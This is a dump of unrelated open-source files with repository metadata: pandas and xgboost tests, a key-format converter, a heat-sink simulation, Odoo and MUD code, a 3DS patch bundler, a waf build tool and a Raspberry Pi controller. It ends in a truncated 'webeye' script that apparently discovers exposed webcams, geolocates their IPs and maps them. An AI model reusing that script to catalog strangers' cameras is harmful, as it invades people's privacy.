# Can't compare until apply on a Series gives the correct dtype
# assert_series_equal(a, b)
list_of_strings = ['00:00:01', np.nan, pd.NaT, timedelta_NaT]
# TODO: unused?
a = pd.to_timedelta(list_of_strings) # noqa
b = Series(list_of_strings).apply(pd.to_timedelta) # noqa
# Can't compare until apply on a Series gives the correct dtype
# assert_series_equal(a, b)
def test_components(self):
rng = timedelta_range('1 days, 10:11:12', periods=2, freq='s')
rng.components
# with nat
s = Series(rng)
s[1] = np.nan
result = s.dt.components
assert not result.iloc[0].isna().all()
assert result.iloc[1].isna().all()
def test_isoformat(self):
td = Timedelta(days=6, minutes=50, seconds=3,
milliseconds=10, microseconds=10, nanoseconds=12)
expected = 'P6DT0H50M3.010010012S'
result = td.isoformat()
assert result == expected
td = Timedelta(days=4, hours=12, minutes=30, seconds=5)
result = td.isoformat()
expected = 'P4DT12H30M5S'
assert result == expected
td = Timedelta(nanoseconds=123)
result = td.isoformat()
expected = 'P0DT0H0M0.000000123S'
assert result == expected
# trim nano
td = Timedelta(microseconds=10)
result = td.isoformat()
expected = 'P0DT0H0M0.00001S'
assert result == expected
# trim micro
td = Timedelta(milliseconds=1)
result = td.isoformat()
expected = 'P0DT0H0M0.001S'
assert result == expected
# don't strip every 0
result = Timedelta(minutes=1).isoformat()
expected = 'P0DT0H1M0S'
assert result == expected
|
bsd-3-clause
| 3,114,407,795,892,254,000
| 37.608187
| 79
| 0.526022
| false
| 3.768695
| true
| false
| false
|
szepeviktor/debian-server-tools
|
security/jwk_convert.py
|
1
|
1364
|
#!/usr/bin/python
"""Convert certbot private_key.json to manuale's account.json
Source: https://gist.github.com/JonLundy/f25c99ee0770e19dc595
./jwk_convert.py private_key.json > private-key.asn1
openssl asn1parse -genconf private-key.asn1 -noout -out private-key.der
openssl rsa -inform DER -in private-key.der -outform PEM -out private-key.key
echo -n '{"key": "' > account.json
paste -s -d '|' private-key.key | sed -e 's/|/\\n/g' | tr -d '\n' >> account.json
echo '", "uri": "https://acme-v01.api.letsencrypt.org/acme/reg/9999999"}' >> account.json # From regr.json
"""
import sys
import json
import base64
import binascii
with open(sys.argv[1]) as fp:
PKEY = json.load(fp)
def enc(data):
missing_padding = 4 - len(data) % 4
if missing_padding:
data += b'=' * missing_padding
return '0x'+binascii.hexlify(base64.b64decode(data, b'-_')).upper()
for k, v in PKEY.items():
if k == 'kty':
continue
PKEY[k] = enc(v.encode())
print "asn1=SEQUENCE:private_key\n[private_key]\nversion=INTEGER:0"
print "n=INTEGER:{}".format(PKEY[u'n'])
print "e=INTEGER:{}".format(PKEY[u'e'])
print "d=INTEGER:{}".format(PKEY[u'd'])
print "p=INTEGER:{}".format(PKEY[u'p'])
print "q=INTEGER:{}".format(PKEY[u'q'])
print "dp=INTEGER:{}".format(PKEY[u'dp'])
print "dq=INTEGER:{}".format(PKEY[u'dq'])
print "qi=INTEGER:{}".format(PKEY[u'qi'])
|
mit
| -5,849,783,586,539,344,000
| 32.268293
| 106
| 0.66349
| false
| 2.669276
| false
| false
| false
|
zagl/ccx-user
|
tutorials/auto/geom.py
|
1
|
3805
|
#!/usr/bin/env python3
import pycgx
import re
import fileinput
import subprocess
def heatSinkTemp(length, width, height, n_fins, fin_width,
base_width, conductivity, ta, emissivity, flux):
    fin_spacing = (width - fin_width) / (n_fins - 1) - fin_width
flux_density = flux / (length*width)
c = pycgx.Cgx()
heatsink = c.makeHeatsink(
[0., 0., 0.],
[length, width, height],
n_fins, fin_width, base_width,
[4,2,2],
'heatsink'
)
top = c.makeSet("ht")
top.add(heatsink.maxX)
bottom = c.makeSet("hb")
bottom.add(heatsink.minX)
channel = c.makeSet("hc")
channel.add(heatsink.inside)
walls = c.makeSet("hw")
walls.add(heatsink.minZ)
walls.add(heatsink.maxZ)
walls.add(heatsink.minY)
walls.add(heatsink.maxY)
rad = c.makeSet('rad')
rad.add(heatsink.inside)
rad.add(heatsink.minX)
rad.add(heatsink.maxX)
rad.add(heatsink.minY)
rad.add(heatsink.maxY)
rad.add(heatsink.maxZ)
flux = c.makeSet("flux")
flux.add(heatsink.minZ)
c.meshLinear()
c.sendMesh()
top.sendFilm()
bottom.sendFilm()
channel.sendFilm()
walls.sendFilm()
rad.sendRadiate()
flux.sendFlux()
c.write('send.fbd')
out = subprocess.getoutput('cgx -bg send.fbd')
l_hor = fin_width*height/(2*(fin_width+height))
with fileinput.FileInput('ht.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUT {0:d}; {1:0.3e}'\
.format(int(ta), l_hor), line), end='')
with fileinput.FileInput('hb.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUB {0:d}; {1:0.3e}'\
.format(int(ta), l_hor), line), end='')
with fileinput.FileInput('hw.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUW {0:d}; {1:0.3e}'\
.format(int(ta), length), line), end='')
with fileinput.FileInput('hc.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUC {0:d}; {1:3d}; {2:d}'\
.format(int(ta), int(length*1000), int(fin_spacing*1e6)),
line, ), end='')
with fileinput.FileInput('rad.rad', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(R[0-9])', r'\1CR', line), end='')
case_deck = '''\
*INCLUDE, INPUT=all.msh
*MATERIAL, Name=Aluminium
*CONDUCTIVITY
%f,0.
*SOLID SECTION, Elset=Eall, Material=Aluminium
*PHYSICAL CONSTANTS,ABSOLUTE ZERO=-273.15,STEFAN BOLTZMANN=5.669E-8
*INITIAL CONDITIONS,TYPE=TEMPERATURE
Nall, %f
*AMPLITUDE, NAME=Aflux
0., %f
*AMPLITUDE, NAME=AinfTemp
0., %f
*AMPLITUDE, NAME=ARad
0., %f
*STEP
*HEAT TRANSFER,STEADY STATE
*DFLUX, AMPLITUDE=Aflux
*INCLUDE, INPUT=flux.dfl
*FILM
*INCLUDE, INPUT=hb.flm
*INCLUDE, INPUT=ht.flm
*INCLUDE, INPUT=hw.flm
*INCLUDE, INPUT=hc.flm
*RADIATE, AMPLITUDE=AinfTemp, RADIATION AMPLITUDE=ARad
*INCLUDE, INPUT=rad.rad
*EL FILE
HFL
*NODE FILE
NT,RFL
*END STEP''' % (conductivity, ta, flux_density, ta, emissivity)
with open('case.inp', 'w') as fobj:
fobj.write(case_deck)
out = subprocess.getoutput('../../application/ccx case')
eval_fbd = '''\
read case.frd
ds 1 e 1'''
with open('eval.fbd', 'w') as fobj:
fobj.write(eval_fbd)
out = subprocess.getoutput('cgx -bg eval.fbd | grep max')
return float(out[5:17])
#for n in range(2,20):
if True:
n = 9
t = heatSinkTemp(
length = 0.113,
width = 0.075,
height = 0.026,
n_fins = 9,
fin_width = 2.2e-3,
base_width = 11e-3,
conductivity = 120.,
ta = 20.,
emissivity = 0.1,
flux = 14.,
)
print(n, t)
|
gpl-2.0
| 7,893,655,362,739,145,000
| 23.548387
| 73
| 0.583443
| false
| 2.721745
| false
| false
| false
|
stormi/tsunami
|
src/primaires/pnj/editeurs/pedit/supprimer.py
|
1
|
2851
|
# -*-coding:Utf-8 -*
# Copyright (c) 2013 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le contexte éditeur Supprimer"""
from primaires.interpreteur.editeur.supprimer import Supprimer
class NSupprimer(Supprimer):
"""Classe définissant le contexte éditeur 'supprimer'.
Ce contexte permet spécifiquement de supprimer un prototype de PNJ.
"""
def interpreter(self, msg):
"""Interprétation du contexte"""
msg = msg.lower()
prototype = self.objet
if msg == "oui":
objet = type(self).importeur
for nom in self.action.split("."):
objet = getattr(objet, nom)
nb_objets = len(prototype.pnj)
if nb_objets > 0:
s = nb_objets > 1 and "s" or ""
nt = nb_objets > 1 and "nt" or ""
self.pere << "|err|{} PNJ{s} existe{nt} modelé{s} sur ce " \
"prototype. Opération annulée.|ff|".format(nb_objets,
s=s, nt=nt)
self.migrer_contexte(self.opts.rci_ctx_prec)
else:
objet(self.objet.cle)
self.fermer()
self.pere << self.confirme
elif msg == "non":
self.migrer_contexte(self.opts.rci_ctx_prec)
else:
self.pere << "|err|Choix invalide.|ff|"
|
bsd-3-clause
| 1,578,359,433,482,653,200
| 41.432836
| 79
| 0.669012
| false
| 3.894521
| false
| false
| false
|
tvtsoft/odoo8
|
addons/website_portal/controllers/main.py
|
1
|
5029
|
# -*- coding: utf-8 -*-
import datetime
from openerp import http
from openerp.http import request
from openerp import tools
from openerp.tools.translate import _
class website_account(http.Controller):
@http.route(['/my', '/my/home'], type='http', auth="public", website=True)
def account(self):
partner = request.env.user.partner_id
values = {
'date': datetime.date.today().strftime('%Y-%m-%d')
}
res_sale_order = request.env['sale.order']
res_invoices = request.env['account.invoice']
quotations = res_sale_order.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['sent', 'cancel'])
])
orders = res_sale_order.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['progress', 'manual', 'shipping_except', 'invoice_except', 'done'])
])
invoices = res_invoices.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['open', 'paid', 'cancelled'])
])
values.update({
'quotations': quotations,
'orders': orders,
'invoices': invoices
})
# get customer sales rep
if partner.user_id:
sales_rep = partner.user_id
else:
sales_rep = False
values.update({
'sales_rep': sales_rep,
'company': request.website.company_id,
'user': request.env.user
})
return request.website.render("website_portal.account", values)
@http.route(['/my/orders/<int:order>'], type='http', auth="user", website=True)
def orders_followup(self, order=None):
partner = request.env['res.users'].browse(request.uid).partner_id
domain = [
('partner_id.id', '=', partner.id),
('state', 'not in', ['draft', 'cancel']),
('id', '=', order)
]
order = request.env['sale.order'].search(domain)
invoiced_lines = request.env['account.invoice.line'].search([('invoice_id', 'in', order.invoice_ids.ids)])
order_invoice_lines = {il.product_id.id: il.invoice_id for il in invoiced_lines}
return request.website.render("website_portal.orders_followup", {
'order': order.sudo(),
'order_invoice_lines': order_invoice_lines,
})
@http.route(['/my/account'], type='http', auth='user', website=True)
def details(self, redirect=None, **post):
partner = request.env['res.users'].browse(request.uid).partner_id
values = {
'error': {},
'error_message': []
}
if post:
error, error_message = self.details_form_validate(post)
values.update({'error': error, 'error_message': error_message})
values.update(post)
if not error:
post.update({'zip': post.pop('zipcode', '')})
partner.sudo().write(post)
if redirect:
return request.redirect(redirect)
return request.redirect('/my/home')
countries = request.env['res.country'].sudo().search([])
states = request.env['res.country.state'].sudo().search([])
values.update({
'partner': partner,
'countries': countries,
'states': states,
'has_check_vat': hasattr(request.env['res.partner'], 'check_vat'),
'redirect': redirect,
})
return request.website.render("website_portal.details", values)
def details_form_validate(self, data):
error = dict()
error_message = []
mandatory_billing_fields = ["name", "phone", "email", "street2", "city", "country_id"]
# Validation
for field_name in mandatory_billing_fields:
if not data.get(field_name):
error[field_name] = 'missing'
# email validation
if data.get('email') and not tools.single_email_re.match(data.get('email')):
error["email"] = 'error'
error_message.append(_('Invalid Email! Please enter a valid email address.'))
# vat validation
if data.get("vat") and hasattr(request.env["res.partner"], "check_vat"):
if request.website.company_id.vat_check_vies:
# force full VIES online check
check_func = request.env["res.partner"].vies_vat_check
else:
# quick and partial off-line checksum validation
check_func = request.env["res.partner"].simple_vat_check
vat_country, vat_number = request.env["res.partner"]._split_vat(data.get("vat"))
if not check_func(vat_country, vat_number): # simple_vat_check
error["vat"] = 'error'
# error message for empty required fields
if [err for err in error.values() if err == 'missing']:
error_message.append(_('Some required fields are empty.'))
return error, error_message
|
agpl-3.0
| -6,674,752,753,006,959,000
| 37.098485
| 114
| 0.552993
| false
| 4.085297
| false
| false
| false
|
tks0123456789/XGB_experiments
|
test_colsample_bylevel.py
|
1
|
2864
|
import xgboost as xgb
from sklearn.datasets import make_classification
n = 2 ** 15
X, y = make_classification(n_samples=n+1, n_features=10, n_informative=5, n_redundant=5,
shuffle=True, random_state=123)
param = {'objective':'binary:logistic','tree_method':'approx',
'eval_metric':'logloss','seed':123}
print('num_row:%d tree_method:%s' % (n+1, 'approx'))
dtrain = xgb.DMatrix(X, y)
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
print('num_row:%d tree_method:%s' % (n, 'approx'))
dtrain = xgb.DMatrix(X[:n], y[:n])
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
print('num_row:%d tree_method:%s' % (n+1, 'exact'))
param['tree_method'] = 'exact'
dtrain = xgb.DMatrix(X, y)
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
"""
num_row:32769 tree_method:approx
colsample_bylevel:1.00
[02:55:11] Tree method is selected to be 'approx'
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
colsample_bylevel:0.10
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
colsample_bylevel:0.01
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
num_row:32768 tree_method:approx
colsample_bylevel:1.00
[02:55:44] Tree method is selected to be 'approx'
[02:55:44] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 118 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.504609
colsample_bylevel:0.10
[02:55:44] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 114 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.546038
colsample_bylevel:0.01
[02:55:44] dmlc-core/include/dmlc/logging.h:235: [02:55:44] src/tree/updater_colmaker.cc:637: Check failed: (n) > (0) colsample_bylevel is too small that no feature can be included
num_row:32769 tree_method:exact
colsample_bylevel:1.00
[03:04:47] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 118 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.504607
colsample_bylevel:0.10
[03:04:47] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 114 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.546035
colsample_bylevel:0.01
[03:04:47] dmlc-core/include/dmlc/logging.h:235: [03:04:47] src/tree/updater_colmaker.cc:637: Check failed: (n) > (0) colsample_bylevel is too small that no feature can be included
"""
|
mit
| 2,984,193,907,683,911,700
| 42.393939
| 180
| 0.693785
| false
| 2.534513
| false
| false
| false
|
Shadowtrance/CakesForeveryWan
|
patches/bundle.py
|
1
|
3840
|
from __future__ import print_function
from sys import argv, exit, stderr
from os import mkdir, makedirs, chdir, system, getcwd
from os.path import getsize
from re import search
from json import loads
from struct import pack
from errno import EEXIST
if len(argv) < 5:
print("Usage: bundle.py <info json> <assembly for patches> <build dir> <out dir>", file=stderr)
exit(1)
info = loads(open(argv[1]).read())
patches_file = open(argv[2]).read()
dir_build = argv[3]
dir_out = argv[4]
dir_top = getcwd()
console_dict = {
"o3ds": 0,
"n3ds": 1
}
type_dict = {
"NATIVE_FIRM": 0,
"TWL_FIRM": 1,
"AGB_FIRM": 2
}
options_dict = {
"keyx": 0b00000001,
"emunand": 0b00000010,
"save": 0b00000100
}
for version in info["version_specific"]:
patches = []
patch_count = len(info["patches"])
verdir_build = dir_build + "/" + version["console"] + "-" + version["version"]
verdir_out = dir_out + "/" + version["console"] + "-" + version["version"]
verfile = patches_file
# Create the patches array based on the global and the version-specific array.
for index in range(patch_count):
patch = {}
for array in [info["patches"][index], version["patches"][index]]:
for patch_info in array:
patch[patch_info] = array[patch_info]
patches.append(patch)
# Set the offset right for the patches
for patch in patches:
match = search("(.create.*[\"|']%s[\"|'].*)" % patch["name"], verfile)
if not match:
print("Couldn't find where %s is created." % patch["name"], file=stderr)
exit(1)
toreplace = match.group(0)
replaceby = ".create \"%(name)s\", %(offset)s\n.org %(offset)s" % patch
verfile = verfile.replace(toreplace, replaceby)
# Set the version-specific variables
if "variables" in version:
vartext = ""
for variable in version["variables"]:
vartext += ".definelabel %s, %s\n" % (variable, version["variables"][variable])
verfile = verfile.replace("#!variables\n", vartext)
# Build dir for this version
try:
mkdir(verdir_build)
except OSError as ex:
if ex.errno == EEXIST:
pass
else:
raise
chdir(verdir_build)
# Compile it
open("patches.s", "w").write(verfile)
if system("armips patches.s"):
print("Couldn't compile version %s for some reason." % version["version"], file=stderr)
exit(1)
# Bake the cake
# What kind of cake is it?
cake_type = console_dict[version["console"]] << 4 | (type_dict[info["type"]] & 0xF)
# Create the header
cake_header = pack("BBBB", patch_count, int(version["version"], 0), cake_type, len(info["description"]) + 5)
cake_header += (info["description"] + '\0').encode()
# Create the patch headers
patch_header_len = 13
cur_offset = len(cake_header) + patch_header_len * patch_count
for patch in patches:
options = 0
if "options" in patch:
for option in patch["options"]:
if option in options_dict:
options |= options_dict[option]
else:
print("I don't know what option %s means." % option, file=stderr)
exit(1)
patch_len = getsize(patch["name"])
cake_header += pack("IIIB", int(patch["offset"], 0), cur_offset, patch_len, options)
cur_offset += patch_len
# Append the patches
cake = cake_header
for patch in patches:
cake += open(patch["name"], "rb").read()
chdir(dir_top)
try:
makedirs(verdir_out)
except OSError as ex:
if ex.errno == EEXIST:
pass
else:
raise
open(verdir_out + "/" + info["name"] + ".cake", "wb").write(cake)
|
gpl-3.0
| -1,199,622,376,286,306,800
| 29.23622
| 112
| 0.580729
| false
| 3.56546
| false
| false
| false
|
hlange/LogSoCR
|
.waf/waflib/extras/msvcdeps.py
|
1
|
10082
|
#!/usr/bin/env python
# encoding: utf-8
# Copyright Garmin International or its subsidiaries, 2012-2013
'''
Off-load dependency scanning from Python code to MSVC compiler
This tool is safe to load in any environment; it will only activate the
MSVC exploits when it finds that a particular taskgen uses MSVC to
compile.
Empirical testing shows about a 10% execution time savings from using
this tool as compared to c_preproc.
The technique of gutting scan() and pushing the dependency calculation
down to post_run() is cribbed from gccdeps.py.
'''
import os
import sys
import tempfile
import threading
from waflib import Context, Errors, Logs, Task, Utils
from waflib.Tools import c_preproc, c, cxx, msvc
from waflib.TaskGen import feature, before_method
lock = threading.Lock()
nodes = {} # Cache the path -> Node lookup
PREPROCESSOR_FLAG = '/showIncludes'
INCLUDE_PATTERN = 'Note: including file:'
# Extensible by outside tools
supported_compilers = ['msvc']
@feature('c', 'cxx')
@before_method('process_source')
def apply_msvcdeps_flags(taskgen):
if taskgen.env.CC_NAME not in supported_compilers:
return
for flag in ('CFLAGS', 'CXXFLAGS'):
if taskgen.env.get_flat(flag).find(PREPROCESSOR_FLAG) < 0:
taskgen.env.append_value(flag, PREPROCESSOR_FLAG)
# Figure out what casing conventions the user's shell used when
# launching Waf
(drive, _) = os.path.splitdrive(taskgen.bld.srcnode.abspath())
taskgen.msvcdeps_drive_lowercase = drive == drive.lower()
def path_to_node(base_node, path, cached_nodes):
# Take the base node and the path and return a node
# Results are cached because searching the node tree is expensive
# The following code is executed by threads, it is not safe, so a lock is needed...
if getattr(path, '__hash__'):
node_lookup_key = (base_node, path)
else:
# Not hashable, assume it is a list and join into a string
node_lookup_key = (base_node, os.path.sep.join(path))
try:
lock.acquire()
node = cached_nodes[node_lookup_key]
except KeyError:
node = base_node.find_resource(path)
cached_nodes[node_lookup_key] = node
finally:
lock.release()
return node
'''
Register a task subclass that has hooks for running our custom
dependency calculations rather than the C/C++ stock c_preproc
method.
'''
def wrap_compiled_task(classname):
derived_class = type(classname, (Task.classes[classname],), {})
def post_run(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).post_run()
if getattr(self, 'cached', None):
return Task.Task.post_run(self)
bld = self.generator.bld
unresolved_names = []
resolved_nodes = []
lowercase = self.generator.msvcdeps_drive_lowercase
correct_case_path = bld.path.abspath()
correct_case_path_len = len(correct_case_path)
correct_case_path_norm = os.path.normcase(correct_case_path)
# Dynamically bind to the cache
try:
cached_nodes = bld.cached_nodes
except AttributeError:
cached_nodes = bld.cached_nodes = {}
for path in self.msvcdeps_paths:
node = None
if os.path.isabs(path):
# Force drive letter to match conventions of main source tree
drive, tail = os.path.splitdrive(path)
if os.path.normcase(path[:correct_case_path_len]) == correct_case_path_norm:
# Path is in the sandbox, force it to be correct. MSVC sometimes returns a lowercase path.
path = correct_case_path + path[correct_case_path_len:]
else:
# Check the drive letter
if lowercase and (drive != drive.lower()):
path = drive.lower() + tail
elif (not lowercase) and (drive != drive.upper()):
path = drive.upper() + tail
node = path_to_node(bld.root, path, cached_nodes)
else:
base_node = bld.bldnode
# when calling find_resource, make sure the path does not begin by '..'
path = [k for k in Utils.split_path(path) if k and k != '.']
while path[0] == '..':
path = path[1:]
base_node = base_node.parent
node = path_to_node(base_node, path, cached_nodes)
if not node:
raise ValueError('could not find %r for %r' % (path, self))
else:
if not c_preproc.go_absolute:
if not (node.is_child_of(bld.srcnode) or node.is_child_of(bld.bldnode)):
# System library
Logs.debug('msvcdeps: Ignoring system include %r', node)
continue
if id(node) == id(self.inputs[0]):
# Self-dependency
continue
resolved_nodes.append(node)
bld.node_deps[self.uid()] = resolved_nodes
bld.raw_deps[self.uid()] = unresolved_names
try:
del self.cache_sig
except AttributeError:
pass
Task.Task.post_run(self)
def scan(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).scan()
resolved_nodes = self.generator.bld.node_deps.get(self.uid(), [])
unresolved_names = []
return (resolved_nodes, unresolved_names)
def sig_implicit_deps(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).sig_implicit_deps()
try:
return Task.Task.sig_implicit_deps(self)
except Errors.WafError:
return Utils.SIG_NIL
def exec_response_command(self, cmd, **kw):
# exec_response_command() is only called from inside msvc.py anyway
assert self.env.CC_NAME in supported_compilers
# Only bother adding '/showIncludes' to compile tasks
if isinstance(self, (c.c, cxx.cxx)):
try:
# The Visual Studio IDE adds an environment variable that causes
# the MS compiler to send its textual output directly to the
# debugging window rather than normal stdout/stderr.
#
# This is unrecoverably bad for this tool because it will cause
# all the dependency scanning to see an empty stdout stream and
# assume that the file being compiled uses no headers.
#
# See http://blogs.msdn.com/b/freik/archive/2006/04/05/569025.aspx
#
# Attempting to repair the situation by deleting the offending
# envvar at this point in tool execution will not be good enough--
# its presence poisons the 'waf configure' step earlier. We just
# want to put a sanity check here in order to help developers
# quickly diagnose the issue if an otherwise-good Waf tree
# is then executed inside the MSVS IDE.
assert 'VS_UNICODE_OUTPUT' not in kw['env']
tmp = None
# This block duplicated from Waflib's msvc.py
if sys.platform.startswith('win') and isinstance(cmd, list) and len(' '.join(cmd)) >= 8192:
program = cmd[0]
cmd = [self.quote_response_command(x) for x in cmd]
(fd, tmp) = tempfile.mkstemp()
os.write(fd, '\r\n'.join(i.replace('\\', '\\\\') for i in cmd[1:]).encode())
os.close(fd)
cmd = [program, '@' + tmp]
# ... end duplication
self.msvcdeps_paths = []
kw['env'] = kw.get('env', os.environ.copy())
kw['cwd'] = kw.get('cwd', os.getcwd())
kw['quiet'] = Context.STDOUT
kw['output'] = Context.STDOUT
out = []
try:
raw_out = self.generator.bld.cmd_and_log(cmd, **kw)
ret = 0
except Errors.WafError as e:
raw_out = e.stdout
ret = e.returncode
for line in raw_out.splitlines():
if line.startswith(INCLUDE_PATTERN):
inc_path = line[len(INCLUDE_PATTERN):].strip()
Logs.debug('msvcdeps: Regex matched %s', inc_path)
self.msvcdeps_paths.append(inc_path)
else:
out.append(line)
# Pipe through the remaining stdout content (not related to /showIncludes)
if self.generator.bld.logger:
self.generator.bld.logger.debug('out: %s' % os.linesep.join(out))
else:
sys.stdout.write(os.linesep.join(out) + os.linesep)
finally:
if tmp:
try:
os.remove(tmp)
except OSError:
pass
return ret
else:
# Use base class's version of this method for linker tasks
return super(derived_class, self).exec_response_command(cmd, **kw)
def can_retrieve_cache(self):
# msvcdeps and netcaching are incompatible, so disable the cache
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).can_retrieve_cache()
self.nocache = True # Disable sending the file to the cache
return False
derived_class.post_run = post_run
derived_class.scan = scan
derived_class.sig_implicit_deps = sig_implicit_deps
derived_class.exec_response_command = exec_response_command
derived_class.can_retrieve_cache = can_retrieve_cache
for k in ('c', 'cxx'):
wrap_compiled_task(k)
|
agpl-3.0
| 2,727,420,422,639,477,000
| 37.480916
| 111
| 0.573696
| false
| 4.200833
| false
| false
| false
|
Ppamo/raspi-noisebox-control
|
noise-control.py
|
1
|
2463
|
BLINKING_RATE_READY = 1.5
BLINKING_RATE_WAITING = 0.1
BLINKING_RATE_LOADING = 0.3
PIN_BUTTON=3
PIN_BLUE=23
PIN_RED=24
import os,sys,time,signal,subprocess,json
import rtmidi_python as rtmidi
import RPi.GPIO as GPIO
midi_in = [rtmidi.MidiIn()]
attached = set()
attached.add(midi_in[0].ports[0])
p = None
with open('noise-control.json') as map_file:
map = json.load(map_file)
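# Pressing the hardware button (PIN_BUTTON) triggers a clean shutdown: kill the
# child process started for the attached MIDI device, release the GPIO pins and
# power the Pi off.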
def button_callback(channel):
kill_cmd(None)
GPIO.cleanup()
log('shutdown now!')
os.system("shutdown now -h")
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(PIN_RED, GPIO.OUT)
GPIO.setup(PIN_BLUE, GPIO.OUT)
GPIO.setup(PIN_BUTTON, GPIO.IN, GPIO.PUD_UP)
GPIO.add_event_detect(PIN_BUTTON, GPIO.FALLING, callback=button_callback,bouncetime=500)
def set_led_status(status):
GPIO.output(PIN_RED, status)
GPIO.output(PIN_BLUE, not status)
return not status
def log(message):
print message
def signal_handler(signum, frame):
global blinking_rate
if signum == signal.SIGUSR1:
log ('Child ready')
blinking_rate = BLINKING_RATE_READY
elif signum == signal.SIGUSR2:
log ('Child busy')
blinking_rate = BLINKING_RATE_WAITING
elif signum == signal.SIGINT or signum == signal.SIGQUIT:
log ('good bye!')
GPIO.cleanup()
sys.exit(0)
def exec_cmd(device):
global p
device_name = device.split(' ')[0]
if device_name in map:
p = subprocess.Popen(args = map[device_name])
def kill_cmd(device):
global p
    if p is not None and p.poll() is None:
        log('killing %d' % p.pid)
        p.send_signal(signal.SIGINT)
time.sleep(0.5)
def attach_device(port):
log('attaching ' + port)
global blinking_rate
blinking_rate = BLINKING_RATE_LOADING
attached.add(port)
exec_cmd(port)
def dettach_device(port):
log('dettaching ' + port)
global blinking_rate
blinking_rate = BLINKING_RATE_LOADING
log('loading')
kill_cmd(port)
attached.remove(port)
log('loading')
blinking_rate = BLINKING_RATE_LOADING
blinking = False
signal.signal(signal.SIGUSR1, signal_handler)
signal.signal(signal.SIGUSR2, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
while True:
# if something has changed in midi ports
if len(set(midi_in[0].ports) ^ attached) > 0:
ports = set(midi_in[0].ports)
        # attach if there are new elements
for i in ports - attached:
attach_device(i)
# dettach if necessary
for i in attached - ports:
dettach_device(i)
blinking = set_led_status(blinking)
time.sleep(blinking_rate)
|
mit
| -6,005,659,446,975,328,000
| 22.457143
| 88
| 0.723508
| false
| 2.668472
| false
| false
| false
|
rvictorino/webeye
|
img_recogn.py
|
1
|
3053
|
from clarifai import rest
from clarifai.rest import ClarifaiApp
import argparse
from urlparse import urlparse
import urllib2
import urllib
import json
import cam_discovery
MAPS_API_KEY = ""
OUTPUT_FILE_PATH = "/var/www/html/webeye/webeye.js"
def get_url_list_from_file(file_path):
file_to_read=open(file_path,'r')
return file_to_read.readlines()
def get_location(uri):
domain = urlparse(uri).netloc.split(":")[0]
result = urllib2.urlopen("http://ip-api.com/json/" + str(domain)).read()
parsed = json.loads(result)
return {"lat": parsed["lat"], "lon": parsed["lon"]}
def generate_map(located_images_list):
url_base = "https://maps.googleapis.com/maps/api/staticmap?"
params = {"key": MAPS_API_KEY, "size": "500x400"}
# generate markers
markers = []
for located_img in located_images_list:
loc = located_img["location"]
markers.append("markers=color:blue%7Clabel:M%7C{0},{1}".format(loc["lat"], loc["lon"]))
final_url = url_base + urllib.urlencode(params) + "&" + "&".join(markers)
